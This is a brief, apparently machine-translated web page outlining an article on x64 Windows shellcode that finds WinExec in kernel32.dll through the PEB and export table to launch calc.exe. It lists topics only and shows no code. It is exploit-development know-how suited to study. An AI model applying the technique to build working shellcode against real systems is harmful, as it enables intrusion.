#Article #Exploiting
[Shellcode x64] Find and execute WinAPI functions with Assembly
What you will learn:
-WinAPI function manual location with assembly
– PEB Structure and PEB_LDR_DATA
– PE File Structure
-Relative Virtual Address calculation
-Export Address Table (EAT)
– Windows x64 calling convention in practice
-Writing in Assembly like a real Giga-Chad…
In this article, the author will manually find the address of the WinExec function in the kernel32.dll file in order to run the calc.exe program (Windows’ built-in calculator) to correctly convey the correct concept of Position Independent in the shell code. .
Items covered:
– Manual localization of WinAPI functions with assembly
– Structure PEB and PEB_LDR_DATA
– PE file structure
– Calculation of Relative Virtual Address
-Output address table (Export Address Table or EAT)
– Windows x64 calling contract in action
– Writing code in assembly
Also, the source of the project can be accessed from this link.
_
You must be logged in to post a comment.